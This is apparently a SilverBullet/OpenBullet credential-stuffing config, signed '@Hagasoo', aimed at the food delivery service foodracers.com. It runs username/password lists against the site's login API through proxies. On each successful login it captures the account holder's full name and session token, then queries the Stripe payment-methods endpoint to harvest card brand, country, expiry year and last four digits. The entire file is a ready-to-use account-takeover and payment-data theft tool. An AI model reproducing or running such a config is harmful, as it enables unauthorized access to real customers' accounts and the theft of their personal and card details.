[SETTINGS]
{
  "Name": "foodracers.com-Hagasoo",
  "SuggestedBots": 70,
  "MaxCPM": 0,
  "LastModified": "2022-02-22T13:10:08.9091648+03:30",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@Hagaso_o",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "foodracers",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
FUNCTION Length "{\"user_session\":{\"username\":\"<USER>\",\"password\":\"<PASS>\"}}" -> VAR "LEN" 

#Post_Data REQUEST POST "https://api.foodracers.com/api/v2/users/sessions" 
  CONTENT "{\"user_session\":{\"username\":\"<USER>\",\"password\":\"<PASS>\"}}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: api.foodracers.com" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "X-Api-Version: 1.0" 
  HEADER "X-App-Version: 3.5.3" 
  HEADER "X-App-Build: 210030530" 
  HEADER "Content-Type: application/json;charset=utf-8" 
  HEADER "Content-Length: <LEN>" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "User-Agent: okhttp/3.12.1" 
  HEADER "Connection: close" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "invalid-credential" 
    KEY "errors" 
  KEYCHAIN Success AND 
    KEY "result" 
    KEY "token" 
    KEY "id" 

#Full_name PARSE "<SOURCE>" JSON "full_name" CreateEmpty=FALSE -> CAP "Full_name" 

#Token PARSE "<SOURCE>" JSON "token" -> VAR "TK" 

#Id PARSE "<SOURCE>" JSON "id" -> VAR "TK2" 

#Get_Credit REQUEST GET "https://api.foodracers.com/api/v2/payments/stripe/payment_methods" 
  
  HEADER "Host: api.foodracers.com" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "X-Api-Version: 1.0" 
  HEADER "X-App-Version: 3.5.3" 
  HEADER "X-App-Build: 210030530" 
  HEADER "Authorization: Token token=<TK>" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "User-Agent: okhttp/3.12.1" 
  HEADER "Connection: close" 

#Card PARSE "<SOURCE>" JSON "brand" CreateEmpty=FALSE -> CAP "Card-Type" 

#country PARSE "<SOURCE>" LR "country\":\"" "\"," CreateEmpty=FALSE -> CAP "Country" 

#exp_year PARSE "<SOURCE>" JSON "exp_year" CreateEmpty=FALSE -> CAP "Exp_year" 

#last4 PARSE "<SOURCE>" JSON "last4" CreateEmpty=FALSE -> CAP "last4" 

#Author FUNCTION Constant "@Hagasoo" -> CAP "ConfigBy" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "No-cc" OR 
    KEY "\"cards\":[]" 

